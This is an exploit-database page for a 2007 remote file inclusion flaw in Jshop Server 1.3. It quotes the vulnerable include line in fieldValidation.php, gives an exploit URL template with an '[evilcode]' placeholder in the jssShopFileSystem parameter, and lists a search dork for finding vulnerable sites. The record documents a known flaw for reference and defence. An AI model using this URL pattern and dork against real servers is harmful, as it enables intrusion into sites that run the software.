header-logo
Suggest Exploit
vendor:
Jshop Server
by:
irvian
N/A
CVSS
HIGH
Remote Code Execution
CWE
Product Name: Jshop Server
Affected Version From: Jshop Server 1.3
Affected Version To: Jshop Server 1.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Jshop Server 1.3 – Remote Code Execution

The Jshop Server 1.3 is vulnerable to remote code execution. An attacker can exploit the vulnerability by injecting malicious code through the 'jssShopFileSystem' parameter in the 'fieldValidation.php' file. This allows the attacker to execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of Jshop Server or apply the necessary patches provided by the vendor.
Source

Exploit-DB raw data:

==========================================================================
# scripts       : Jshop Server 1.3
# Discovered By : irvian
# script        : http://www.jshop.co.uk/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          :powered by jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]

# milw0rm.com [2007-01-10]

Navigation

Suggest Exploit

Services By CQR